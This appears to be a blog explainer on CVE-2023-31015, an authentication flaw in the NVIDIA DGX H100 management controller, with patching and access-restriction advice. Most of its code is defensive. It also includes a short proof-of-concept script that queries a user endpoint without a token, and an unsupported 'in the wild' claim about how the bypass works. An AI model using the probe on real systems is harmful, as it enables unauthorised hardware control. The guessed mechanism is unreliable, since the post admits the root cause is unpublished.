In 2023, NVIDIA published a security advisory detailing a critical vulnerability, CVE-2023-31015, affecting the NVIDIA DGX H100 Baseboard Management Controller (BMC). For those running AI supercomputers, this isn’t just tech jargon. It’s a wake-up call about improper authentication flaws that could let attackers take over the management layer of your hardware.
Let’s break down what this vulnerability is, how it can be exploited, and what you should do.
What is CVE-2023-31015?
The NVIDIA DGX H100 BMC provides out-of-band system management through a REST API. This API should only be accessible to authenticated users such as system admins. Because of an improper authentication flaw in that REST service, a host user may bypass the intended checks and gain access to sensitive REST endpoints.
1. REST API Exposure
The BMC REST API is served by a web server (often on port 443 or 80) that accepts requests to endpoints such as /api/auth and /api/sensors.
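To see how exposed that web server is, you can check from a given host whether the BMC's ports accept connections at all. The following is a minimal sketch using only Python's standard library. The function name `open_ports` and the hostname in the usage comment are assumptions made for illustration, not part of any NVIDIA tooling.

```python
import socket

def open_ports(host, ports=(443, 80), timeout=2.0):
    """Return the subset of `ports` that accept a TCP connection on `host`."""
    reachable = []
    for port in ports:
        try:
            # create_connection raises OSError on refusal, timeout, or DNS failure
            with socket.create_connection((host, port), timeout=timeout):
                reachable.append(port)
        except OSError:
            pass
    return reachable

# Usage (hypothetical hostname, replace with your BMC's address):
#   print(open_ports("bmc-dgx-h100.local"))
```

If this returns a non-empty list when run from a machine that has no business managing hardware, the BMC is reachable from more of your network than it should be.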
2. Authentication Check Fails
Suppose the endpoint /api/users/me should only return information for a properly logged-in user. Due to the vulnerability, an attacker can trick the REST backend into skipping the authentication check.
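NVIDIA has not published the root cause, so the following is only a generic illustration of how an authentication check can be skipped, not the actual BMC code. It contrasts a hypothetical flawed check, which rejects a request only when a token is present and wrong, with a deny-by-default version. `VALID_TOKENS` and both function names are invented for this sketch.

```python
import hmac

# Hypothetical token store; a real BMC validates sessions differently.
VALID_TOKENS = {"s3cr3t-session-token"}

def _bearer_token(headers):
    """Extract the token from an 'Authorization: Bearer <token>' header, or ''."""
    auth = headers.get("Authorization", "")
    prefix = "Bearer "
    return auth[len(prefix):] if auth.startswith(prefix) else ""

def is_authorized_flawed(headers):
    """Buggy check: only rejects when a token is present AND wrong."""
    token = _bearer_token(headers)
    if token and token not in VALID_TOKENS:
        return False
    return True  # a missing or empty token falls through to here

def is_authorized_fixed(headers):
    """Deny by default: access requires a present, matching token."""
    token = _bearer_token(headers)
    if not token:
        return False
    # compare_digest avoids leaking information through comparison timing
    return any(
        hmac.compare_digest(token.encode(), valid.encode())
        for valid in VALID_TOKENS
    )
```

With an empty header dictionary, `is_authorized_flawed({})` returns `True` while `is_authorized_fixed({})` returns `False`. The design point is that the fixed version has to prove a request is valid before granting access, instead of looking for a reason to reject it.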
Example Exploit Code
Below is a simplified Python script showing how an attacker might interact with the exposed endpoint. This is for educational use only.

    import requests

    # Replace with your actual BMC IP or hostname:
    BMC_API = "https://bmc-dgx-h100.local/api/"

    # Attack: skip authentication by sending a missing or default token
    headers = {
        # 'Authorization': 'Bearer <INVALID_OR_EMPTY>'  # omitted on purpose
    }

    # Try to read user info (should require auth).
    # verify=False skips TLS validation, since BMCs often use self-signed certs.
    response = requests.get(BMC_API + "users/me", headers=headers, verify=False, timeout=10)

    if response.status_code == 200:
        print("Endpoint answered without authentication! Data returned:")
        print(response.text)
    else:
        print(f"Request failed (probably patched): {response.status_code}")

*Tip:* In the wild, researchers noticed that missing, empty, or default tokens could let you in.
Real-World Risks
- Physical hardware control: Attackers could remotely monitor or control sensors, fans, or even brick the management controller.
- Steal cluster secrets: The BMC can store SSH keys or certificates, which are valuable to an attacker seeking persistence.
- Launch DoS: Compromised or crashed BMCs can prevent remote troubleshooting, locking out admins and causing downtime.
Affected Versions
All NVIDIA DGX H100 systems running BMC firmware from *before* the security update that fixes CVE-2023-31015 may be exposed. Always check NVIDIA Product Security for the latest bulletins.
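Once you know the fixed firmware version from the bulletin, comparing it against what each system reports is easy to script. The sketch below assumes the versions are plain dotted numbers such as `1.10.3`. That format is an assumption, and the version strings in the usage note are placeholders, not real DGX H100 firmware releases.

```python
def parse_version(text):
    """Turn a dotted version such as '1.10.3' into a tuple of ints."""
    return tuple(int(part) for part in text.strip().split("."))

def needs_update(installed, fixed):
    """True when the installed firmware is older than the fixed release."""
    a, b = parse_version(installed), parse_version(fixed)
    # Pad the shorter tuple with zeros so '1.2' and '1.2.0' compare as equal
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a < b
```

For example, `needs_update("1.9.0", "1.10.0")` is `True` because the parts are compared numerically, which a plain string comparison would get wrong.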
What Should You Do?
- Patch now: Download and install the fixed firmware from NVIDIA Support.
- Restrict network access: Whitelist the IPs that can access the BMC REST service, and block everyone, external or internal, who is not on your hardware team.
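Real enforcement belongs in firewall rules or switch ACLs, but the allowlist logic itself is simple and is also useful for auditing BMC access logs. Here is a minimal sketch using Python's standard `ipaddress` module. The subnets in `ALLOWED_NETWORKS` and the function name `is_allowed` are hypothetical and should be replaced with your own management ranges.

```python
import ipaddress

# Hypothetical management subnets; substitute your own.
ALLOWED_NETWORKS = [
    ipaddress.ip_network("10.20.0.0/24"),
    ipaddress.ip_network("192.168.50.10/32"),
]

def is_allowed(client_ip, networks=ALLOWED_NETWORKS):
    """Return True if client_ip falls inside any allowlisted network."""
    try:
        address = ipaddress.ip_address(client_ip)
    except ValueError:
        return False  # malformed input is treated as not allowed
    return any(address in net for net in networks)
```

Running every source address from your BMC access logs through `is_allowed` flags clients that reached the REST service from outside the expected ranges.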
References
- Official NVIDIA Security Bulletin - CVE-2023-31015
- NIST National Vulnerability Database Entry
Conclusion
CVE-2023-31015 is a critical reminder that even the management layers of your AI infrastructure can be Achilles’ heels. If you manage NVIDIA DGX platforms, drop everything and patch your BMC firmware today. Bad actors don’t need another weak link.
Stay safe, and keep all components—software and hardware—up to date.
If you want practical guides on securing your AI infrastructure, or have questions about CVE-2023-31015, get in touch or follow this blog for more exclusive breakdowns!
Timeline
Published on: 09/20/2023 02:15:00 UTC
Last modified on: 09/22/2023 16:04:00 UTC